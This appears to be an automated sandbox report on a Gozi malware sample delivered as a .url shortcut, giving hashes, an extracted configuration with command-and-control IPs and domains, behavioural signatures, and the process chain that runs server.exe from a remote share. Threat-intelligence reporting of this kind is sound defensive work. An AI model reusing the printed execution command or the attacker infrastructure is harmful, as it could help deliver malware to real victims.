Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
14-03-2023 08:15
Static task
static1
Behavioral task
behavioral1
Sample
Agenzia/Agenzia.txt.url
Resource
win7-20230220-en
General
-
Target
Agenzia/Agenzia.txt.url
-
Size
195B
-
MD5
cc689d7d4fa6905ebc5958630848fa00
-
SHA1
3d0ca3eeb7a45d2367b0693188ba99cf68f6a520
-
SHA256
67f14cb9d372a7a295a96a82f2eab679b7373f3613df6b8dcf9434482047caa1
-
SHA512
974c9c969029636eb6db168cc65ddaed096b2695815107f8f0c14da0ab419c7ac25c76a8f16eeaad03102efcd918991f11e7a9685a1fb94a851280349862efdd
Malware Config
Extracted
gozi
7713
checklist.skype.com
62.173.142.51
94.103.183.153
193.233.175.111
109.248.11.145
31.41.44.106
191.96.251.201
-
base_path
/drew/
-
build
250255
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
rundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
rundll32.exedescription pid process target process PID 1392 wrote to memory of 1884 1392 rundll32.exe server.exe PID 1392 wrote to memory of 1884 1392 rundll32.exe server.exe PID 1392 wrote to memory of 1884 1392 rundll32.exe server.exe
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Agenzia\Agenzia.txt.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
\??\UNC\109.248.11.162\Agenzia\server.exe"\\109.248.11.162\Agenzia\server.exe"2⤵